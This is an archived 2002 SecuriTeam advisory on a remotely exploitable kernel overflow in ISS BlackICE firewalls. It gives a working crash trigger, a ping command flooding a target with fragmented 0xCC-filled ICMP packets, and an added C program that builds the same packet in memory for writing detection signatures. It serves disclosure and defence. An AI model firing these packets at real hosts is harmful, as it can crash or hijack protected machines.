[NT] ISS BlackICE Exploitable Kernel Overflow
From: support@securiteam.com To: list@securiteam.com Date: Sat, 9 Feb 2002 13:51:09 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
ISS BlackICE Exploitable Kernel Overflow
------------------------------------------------------------------------
SUMMARY
The following is a follow-up to our recent post
<http://www.securiteam.com/windowsntfocus/5KP011P6AY.html> "Remote Denial
of Service Vulnerability in BlackICE Products". Further research by eEye
Digital Security has shown that this issue is not merely a denial of
service: it is a remotely exploitable buffer overflow that allows execution
of arbitrary code in the kernel context of the protected host.
DETAILS
Vulnerable systems:
* BlackICE Defender 2.9
* BlackICE Defender for Server 2.9
* BlackICE Agent for Workstation 3.0 and 3.1
* BlackICE Agent for Server 3.0 and 3.1
* RealSecure Server Sensor 6.0.1 and 6.5
A few days ago Matt Taylor (quisit@quest.net) posted to several security
mailing lists stating that BlackICE was vulnerable to a denial of service
attack that could crash the BlackICE service and/or blue-screen the remote
system. There was considerable discussion on the lists about the "denial
of service" attack and which other versions it affected.
The day after Matt posted his DoS attack against BlackICE, ISS (the makers
of BlackICE) published their own security advisory to notify customers of
the new vulnerability and of a workaround to use until a patch was
released. ISS's advisory also described the vulnerability as a denial of
service.
So far we have not seen anyone publish accurate technical information about
the "denial of service" vulnerability. However, Ryan Permeh and Riley
Hassell of eEye Digital Security have recently conducted research showing
that the BlackICE "denial of service" is in fact an exploitable buffer
overflow, which allows anyone to remotely compromise users of BlackICE and
potentially of RealSecure Server Sensor.
The research was done against BlackICE Defender 2.9 with blackice.exe
version 3.1.10. eEye has not confirmed whether the other BlackICE variants
or RealSecure are also exploitable. However, since all of them are
vulnerable to the same "denial of service" attack, it is reasonable to
assume that they are exploitable as well.
The BlackICE buffer overflow is a significant flaw that allows an attacker
to execute code in kernel context. eEye's testing has shown that by sending
only a handful of large ICMP echo request packets (16 packets of roughly
60 KB each, although packet size appears not to matter as long as the
packet is fragmented) the kernel can be made to return directly into the
ICMP payload. eEye's testing has also shown that there is a significant
amount of space to work with in the payload, which allows a large number of
exploit scenarios, including, but not limited to, trojaning the NT kernel.
The code executes at an address of the form 0xF5XXXXXX, which is clearly
within kernel memory space. At that point EBX holds a pointer to more of
the attacker's code (roughly 60,000 bytes of potential shellcode), and
several bytes of potentially jumpable code remain after the code shifts.
Example:
To make the kernel fault on an INT 3 instruction (opcode 0xCC, the hard
breakpoint on Intel hardware), issue the following command against a
BlackICE-protected server from a Linux machine, replacing 1.1.1.1 with the
address of the target. The -s 60000 option sets a 60,000-byte payload,
which is fragmented on any common link, and -p CC fills that payload with
0xCC bytes so that control landing anywhere inside it hits a breakpoint.
ping -s 60000 -c 16 -p CC 1.1.1.1
eEye has verified this behaviour on Windows 2000 Server and Professional,
and is currently finishing a pure kernel-mode exploit that allows an
attacker to manipulate the kernel and execute arbitrary code in kernel
context. eEye will not be publishing this exploit. This alert contains
enough technical detail to show that the overflow does occur and that
execution reaches the 0xCC breakpoint in the payload, which demonstrates
that an attacker can jump to and execute code of their choice.
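To see what the trigger above actually puts on the wire, the following is an added example (written for this page, not code from eEye, ISS or the original advisory). It builds the same ICMP echo request that `ping -s 60000 -p CC` constructs, with a correct RFC 1071 checksum, and computes how many IPv4 fragments it becomes at a given MTU, which is what a detection signature for oversized or fragmented echo requests would key on. Nothing is sent; the packet is assembled in memory only. The identifier and sequence values, the 1500-byte MTU and the 56-byte "default payload" comparison are assumptions chosen for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define IPV4_HDR_LEN   20      /* IPv4 header without options */
#define ICMP_HDR_LEN   8       /* type, code, checksum, identifier, sequence */
#define IP_MAX_DGRAM   65535   /* largest IPv4 datagram */

/* RFC 1071 one's-complement checksum, as used for the ICMP checksum field. */
uint16_t icmp_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    while (len > 1) {
        sum += (uint32_t)((data[0] << 8) | data[1]);
        data += 2;
        len -= 2;
    }
    if (len == 1)                       /* odd trailing byte, padded with zero */
        sum += (uint32_t)(data[0] << 8);
    while (sum >> 16)                   /* fold carries back into 16 bits */
        sum = (sum & 0xffffu) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Build an ICMP echo request whose data field is payload_len copies of
 * `pattern`, i.e. what `ping -s <payload_len> -p <pattern>` constructs
 * before IP fragmentation. Returns the ICMP message length, or 0 if it
 * would not fit in `out` or in a single IPv4 datagram. */
size_t build_icmp_echo(uint8_t *out, size_t out_cap,
                       uint16_t id, uint16_t seq,
                       uint8_t pattern, size_t payload_len)
{
    size_t total = ICMP_HDR_LEN + payload_len;
    if (total > out_cap || total > IP_MAX_DGRAM - IPV4_HDR_LEN)
        return 0;
    out[0] = 8;                          /* type 8 = echo request */
    out[1] = 0;                          /* code 0 */
    out[2] = out[3] = 0;                 /* checksum is computed over a zeroed field */
    out[4] = (uint8_t)(id >> 8);  out[5] = (uint8_t)id;
    out[6] = (uint8_t)(seq >> 8); out[7] = (uint8_t)seq;
    memset(out + ICMP_HDR_LEN, pattern, payload_len);
    uint16_t csum = icmp_checksum(out, total);
    out[2] = (uint8_t)(csum >> 8);
    out[3] = (uint8_t)csum;
    return total;
}

/* Number of IPv4 fragments a datagram carrying icmp_len bytes of ICMP
 * becomes on a link with the given MTU: every fragment except the last
 * carries a multiple of 8 data bytes after its own 20-byte IP header. */
int ipv4_fragment_count(size_t icmp_len, size_t mtu)
{
    size_t per_frag = ((mtu - IPV4_HDR_LEN) / 8) * 8;
    if (mtu <= IPV4_HDR_LEN || per_frag == 0)
        return -1;
    return (int)((icmp_len + per_frag - 1) / per_frag);
}

static uint8_t g_pkt[IP_MAX_DGRAM];     /* scratch buffer for the built message */

/* Build an echo request and verify the checksum the way a receiver does:
 * summing the whole message, checksum field included, must give zero.
 * Returns the message length on success, 0 on failure. Identifier 0x1234
 * and sequence 1 are arbitrary illustration values. */
size_t build_and_verify(uint8_t pattern, size_t payload_len)
{
    size_t n = build_icmp_echo(g_pkt, sizeof g_pkt, 0x1234, 1, pattern, payload_len);
    if (n == 0 || icmp_checksum(g_pkt, n) != 0)
        return 0;
    return n;
}

int main(void)
{
    /* Constructed example: the advisory's `ping -s 60000 -c 16 -p CC` trigger. */
    size_t n = build_and_verify(0xCC, 60000);
    printf("ICMP echo request: %zu bytes, payload byte 0x%02X, checksum 0x%02X%02X\n",
           n, g_pkt[ICMP_HDR_LEN], g_pkt[2], g_pkt[3]);
    printf("At a 1500-byte MTU each request becomes %d IPv4 fragments; "
           "the advisory sends 16 of them.\n", ipv4_fragment_count(n, 1500));
    printf("A 56-byte ping payload would be %d fragment(s) at the same MTU.\n",
           ipv4_fragment_count(ICMP_HDR_LEN + 56, 1500));
    return 0;
}
```

A 60,000-byte payload plus the 8-byte ICMP header is 60,008 bytes, which at a 1500-byte MTU splits into 41 fragments, all but the last carrying 1480 bytes; a normal 56-byte ping fits in one. Since the advisory reports that any size that fragments is enough, a signature on "ICMP echo request with the more-fragments flag set or a non-zero fragment offset" covers the trigger better than a threshold on 60 KB.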
So once again, this is not simply a denial of service. If you are running
a vulnerable version of BlackICE you are exposed to a remote kernel-level
compromise in which an attacker can execute arbitrary code.
Vendor status:
ISS has released a patch for this buffer overflow vulnerability. More
information about the patch is available at:
<http://www.iss.net/support/consumer/BI_downloads.php>
ADDITIONAL INFORMATION
The information has been provided by Matt Taylor (quisit@quest.net), and
by Ryan Permeh and Riley Hassell of eEye Digital Security
(http://www.eEye.com).
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.